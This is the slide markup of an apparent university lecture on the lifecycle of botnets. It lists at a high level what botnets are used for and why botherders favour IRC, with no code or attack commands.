              <a:sym typeface="Arial" panose="020B0604020202020204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2886710" y="5492115"/>
            <a:ext cx="6418580" cy="1139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Gianforte School of Computing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ea typeface="+mn-ea"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" alt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ea typeface="+mn-ea"/>
              <a:cs typeface="Palatino Linotype" panose="020405020505050303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E-mail: fangtian.zhong@montana.edu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 The Lifecycle of a Botnet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3" name="object 3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08873" y="1113790"/>
            <a:ext cx="7374255" cy="52279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Botnets used for?</a:t>
            </a:r>
            <a:b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</a:b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object 5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520700" y="1099185"/>
            <a:ext cx="5911215" cy="419798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>
            <a:lvl1pPr marL="0">
              <a:defRPr sz="2000" b="0" i="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93675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef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2800" spc="-10" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" spc="-20" dirty="0"/>
              <a:t>Spam</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-20" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Adware/Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>Installation</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Identity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>Theft</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="725"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Making</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>Income!!!</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Keystroke</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr sz="2800" spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="193675" indent="-180975">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef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2800" dirty="0"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>registration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:endParaRPr b="1" spc="-1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431915" y="2349500"/>
            <a:ext cx="5310505" cy="2006600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202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3020" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4204335" algn="l"/>
              </a:tabLst>
            </a:pP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Whatever</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-4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you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="1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pay</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-2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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-3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them</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-4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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-2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do!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" spc="-2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Or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-3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whatever</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-4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makes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-3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money</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-1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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-2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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-1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spc="-2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fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" spc="-2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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-15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spc="-1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operator.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="-10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Types Botnets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745" y="1022350"/>
            <a:ext cx="2552700" cy="4959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IRC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" b="1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3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botnets</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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437515" y="1594485"/>
            <a:ext cx="7684770" cy="1169035"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9805"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202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3020" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4204335" algn="l"/>
              </a:tabLst>
            </a:pP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Until recently, IRC-based botnets were by far the most prevalent type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exploited in the wild.</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1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6" name="object 2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361315" y="2941320"/>
            <a:ext cx="7255510" cy="3192145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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200000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000"/>
              <a:buBlip>
                <a:blip r:embed="rId4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Benefits of IRC to botherder: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8395" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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Well established and understood protocol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128395" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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Freely available IRC server software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128395" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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Interactive, two-way communication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128395" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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Offers redundancy with linked IRC servers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128395" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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Most blackhats grow up using IRC.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122285" y="1638935"/>
            <a:ext cx="3415030" cy="4147185"/>
            <a:chOff x="10872" y="3022"/>
            <a:chExt cx="5378" cy="6531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="object 3"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5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11553" y="5765"/>
              <a:ext cx="1561" cy="1692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 4"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7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5640" y="6105"/>
              <a:ext cx="609" cy="667"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 5"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9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4783" y="8887"/>
              <a:ext cx="612" cy="667"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="object 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13822" y="6105"/>
              <a:ext cx="641" cy="2896"/>
              <a:chOff x="7252716" y="3876611"/>
              <a:chExt cx="407034" cy="1838960"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="object 7"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10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252716" y="3876611"/>
                <a:ext cx="386930" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="object 8"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11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272655" y="4583112"/>
                <a:ext cx="386930" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="object 9"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12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272655" y="5289549"/>
                <a:ext cx="386930" cy="425450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="object 10"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7456170" y="4300473"/>
                <a:ext cx="0" cy="989330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="282575"/>
                    </a:lnTo>
                  </a:path>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="706501"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="989076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/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="object 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="14783" y="7775"/>
              <a:ext cx="612" cy="1003"/>
              <a:chOff x="7862951" y="4937061"/>
              <a:chExt cx="388620" cy="636905"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="object 12"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId14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862951" y="4937061"/>
                <a:ext cx="388454" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="object 13"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId15"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8067929" y="5361050"/>
                <a:ext cx="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h="212725">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="212725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/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="object 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11990" y="3022"/>
              <a:ext cx="4260" cy="6088"/>
              <a:chOff x="6089777" y="1919223"/>
              <a:chExt cx="2705100" cy="3865879"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="object 15"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId16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407400" y="5360987"/>
                <a:ext cx="386930" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="object 16"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId17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407400" y="4654486"/>
                <a:ext cx="386930" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="object 17"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId18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862951" y="3594036"/>
                <a:ext cx="388454" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="object 18"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId19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862951" y="4230687"/>
                <a:ext cx="388454" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="object 19"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId20"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7423785" y="2765932"/>
                <a:ext cx="1287145" cy="243204"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1287145" h="243205">
                    <a:moveTo>
                      <a:pt x="837311" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="587756" y="74040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209550" y="34162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378206" y="136016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129921" y="209550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448818" y="243204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697230" y="169671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1077341" y="209676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1286891" y="147700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906653" y="107568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1156335" y="33654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837311" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="object 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId21"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7423785" y="2765932"/>
                <a:ext cx="1287145" cy="243204"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1287145" h="243205">
                    <a:moveTo>
                      <a:pt x="837311" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="890514" y="5597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943699" y="11208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="996870" y="16827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050031" y="22446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1103184" y="28057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1156335" y="33654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1106410" y="48437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1056468" y="63220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1006519" y="78003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956577" y="92786"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906653" y="107568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954182" y="112575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001712" y="117590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1049242" y="122611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1096771" y="127635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1144301" y="132658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191831" y="137679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1239361" y="142694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1286891" y="147700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1234503" y="163206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182116" y="178688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1129728" y="194171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1077341" y="209676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029816" y="204676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982301" y="199675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="934791" y="194675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887285" y="189674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839779" y="184673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792269" y="179673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744754" y="174672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697230" y="169671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647547" y="184378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597865" y="199085"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548182" y="213791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498500" y="228498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448818" y="243204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395668" y="237616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342519" y="232024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289369" y="226425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236220" y="220815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183070" y="215191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129921" y="209550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179602" y="194843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229277" y="180136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278940" y="165430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328585" y="150723"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378206" y="136016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324205" y="130349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270191" y="124667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216166" y="118975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162132" y="113274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108092" y="107566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54047" y="101853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52387" y="80633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104775" y="65150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157162" y="49668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209550" y="34162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263550" y="39830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317564" y="45512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371589" y="51204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425623" y="56905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479663" y="62613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533708" y="68326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587756" y="74040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637667" y="59196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687577" y="44375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737488" y="29573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787400" y="14783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837311" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="909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/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="object 21"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId22"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6089777" y="2262123"/>
                <a:ext cx="1554480" cy="1341755"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1554479" h="1341754">
                    <a:moveTo>
                      <a:pt x="1488424" y="40204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1322324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16510" y="1341627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1505024" y="59430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488424" y="40204"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1554479" h="1341754">
                    <a:moveTo>
                      <a:pt x="1541142" y="31876"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1498092" y="31876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514602" y="51180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1505024" y="59430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521587" y="78612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1541142" y="31876"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1554479" h="1341754">
                    <a:moveTo>
                      <a:pt x="1498092" y="31876"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1488424" y="40204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1505024" y="59430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514602" y="51180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498092" y="31876"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1554479" h="1341754">
                    <a:moveTo>
                      <a:pt x="1554479" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1471802" y="20954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488424" y="40204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498092" y="31876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1541142" y="31876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155447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p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="object 22"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId23"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7456170" y="2887598"/>
                <a:ext cx="1222375" cy="2473960"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="919226"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="678941" y="69850"/>
